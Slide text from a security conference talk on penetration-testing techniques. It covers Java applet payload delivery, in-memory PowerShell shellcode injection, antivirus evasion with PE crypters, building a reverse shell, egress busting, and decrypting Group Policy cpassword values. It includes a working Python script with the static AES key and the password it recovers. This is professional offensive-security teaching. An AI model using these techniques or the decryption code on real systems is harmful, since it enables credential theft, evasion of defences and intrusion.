for all of the domain computers? Research from: Sogeti ESEC Pentest. Article: http://esec-pentest.sogeti.com/ exploiting
BSIDES Las Vegas Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email:
[email protected] https://www.trustedsec.com @TrustedSec
Introduc)on • As penetration testers, exploit writers, huggers, etc. we have secret techniques we always use. • Although some may or may not be public, they are generally obscure and not well known.
• The purpose of today’s talk is to show you my secrets.. Some of my techniques that I use that aren’t widely known. • Why show you? I’m an open book on everything I do and sharing is what it’s all about.
Technique #1 • Java Applet Attack (SET) – Well known attack method right? • Do you know how it actually works? • Do you know the techniques behind it to make it successful?
ZOMG APT • News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. • Made me feel kind of special =) • How people found out it was set?
ILIKEHUGS
DEMO: Walking through the Attack
Explaining the Applet • Parameters that are injected into the HTML code are pulled from the Applet. • Obfuscated and randomized each time. • Parameters tell the Applet which attacks to use.
Method 1 – Binary Dropper • Binary is downloaded from attacker machine via web server (Java downloader) • Obfuscated binary each time per deployment.. Combination of PE manipulation, UPX, and rewriting binary on fly (import pefile)
DEMO: Binary Dropping Technique
Method 1 – Weak Sauce • Binary’s are easily picked up by AV if signatures focus on obfuscation techniques. (SET changes them each version) • Direct interaction with Windows file system and writing to disk. • Multiple points of evidence on victim machine.
Method 2 – Shellcodeexec • Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele. • Executable takes int main(int argc, char*argv[]) parameter for alphanumeric shellcode. Uses VirtualAlloc for read, write, and execute memory space. • Alphanumeric shellcode is executed in memory and payload is delivered.
DEMO: ShellcodeExec
Method 2 – Easily detectable • Shellcodeexec is a simple yet awesome method but still has a number of drawbacks. • Like Method 1 – Binary’s can be picked up unless custom version created. Direct interaction with Windows file system and writing to disk. • Like Method 1 - Multiple points of evidence on victim machine.
Method 3 – Powershell Injec)on • Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8). • Powershell gives us complete flexibility on a number of post exploitation situations. • Technique discovered by Matthew Graeber (you rock).
Method 3 – PS ShellCode Injec)on • Applet detects if powershell is installed on system. • Grabs the operating system type (x86 / x64) • Deploys Shellcode straight through powershell.
DEMO: ShellcodeExec
Method 3 – Powershell Injec)on • Never touches disk – AV / HIPS signatures go out the door. • Obfuscated each time so that memory inspection is extremely difficult. • Extremely reliable and stable.
PE Security Evasion
Scenario 1 – Dropping PE’s like its hot • Your using Metasploit – All of them are being picked up by AV, HIPS, etc. • Most cases, I will rewrite the exe template for Metasploit to customize binary for evasion. • Couple cool ways to do this.
Modifying PE For Evasion in MSF • Easiest way for me is to make a simple program that creates a RWX process then have the program execute Metasploit Shellcode. • You can also modify the Metasploit exe.rb template and obfuscate the code that way.
PE Crypters • One of my favorites was recently released called Hyperion (Christian Ammann from nullsecurity.net). • Encrypts PE the file using a randomized simple cipher key with AES 128. • When executable is run, it brute forces the AES key then decrypts the PE file for you.
DEMO: Hyperion
Hyperion Encryp)on • Very cool concept and easy to use and write one for yourself. • Ability to have a completely unique PE file each time. • Slight downfall, stub used for brute force is not polymorphic.
Building a Simple Reverse Shell
The Reverse Shell • Connects out to the attacker (reverse shell).
Compiling Binaries • PyInstaller – Compiles python code for you into a binary by wrapping the Python Interpreter into the executable. • Works on Linux, OSX, and Windows. python Configure.py python Makespec.py –onefile –noconsole shell.py python Build.py shell/shell.spec cd shell\dist
Making it easy – pybuild.py • All code and samples will be released on the TrustedSec website soon.
DEMO: Building a Shell
Bypassing AV
Finding your way home
Bumping the Firewall • A number of companies restrict ports outbound and only allow what’s needed for the business. • Trouble getting payloads out, especially if you only have one shot.
Egress Bus)ng • Few ways to do it, pre-staged payload for identifying way out. • Attempt staged reverse on every port. • Metasploit has an ALLPORTS payload as well.
Egress Buster 0.2 • Server/Client situation where victim connects out on every port 1024 ports at a time. • Server listens for connection and reports back. • Here’s where you can have some fun.
Egress Buster Reverse Shell
Egress Buster Reverse Shell • Released this week! • Allows you to bust all ports inside the firewall and spawn a command shell. • Custom, so no AV picks this up. Byte compiled into an executable.
DEMO: Egress Buster Reverse Shell
Egress Buster Reverse Shell Usage • Recent Penetration Test – Found file upload + execute binary’s. • Could not find a standard port out i.e. 80, 443, 53, 25, etc. • Wrote this to deploy and found several obscure ports that were allowed.
Fun with Group Policy
One of my PERSONAL Favorites • How many times have we been on a pentest with just a domain user? • Need that local administrator account for all of the domain computers? Research from: Sogeti ESEC Pentest Article: http://esec-pentest.sogeti.com/ exploiting-windows-2008-group-policypreferences
The AZack • Navigate to a domain controller and hit up the SYSVOL share. • Head to the domain name and Policies folder. • Look for a GUID then MACHINE \Preferences\Group. • Look for the Groups.xml file.
Contents of File
Sta)c Key for AES Anyone?
Python Code # code was developed and created from # http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences from Crypto.Cipher import AES from base64 import b64decode key = """ 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b """.replace(" ","").replace("\n","").decode('hex') cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=") o = AES.new(key, 2).decrypt(cpassword) print o[:-ord(o[-1])].decode('utf16')
Decrypted Password
>>> print o[:-ord(o[-1])].decode('utf16') Local*P4ssword!
Expanding on Group.xml
More Passwords Stored • The folks over at rewt dance ( http://rewtdance.blogspot.com/ 2012/06/exploiting-windows-2008group-policy.html) found a few more areas that store passwords using the cpassword attribute. • Services, ScheduledTasks, SQL servers and much more are impacted.
List of Other Affected Areas (from rewt dance) Services\Services.xml http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13) ScheduledTasks\ScheduledTasks.xml http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13) http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13) http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13) Printers\Printers.xml http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13) Drives\Drives.xml http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13) DataSources\DataSources.xml http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
There’s a ton more of these… Hopefully can make these a series.
Downloads
For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.
Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email:
[email protected] https://www.trustedsec.com TrustedSec, LLC @TrustedSec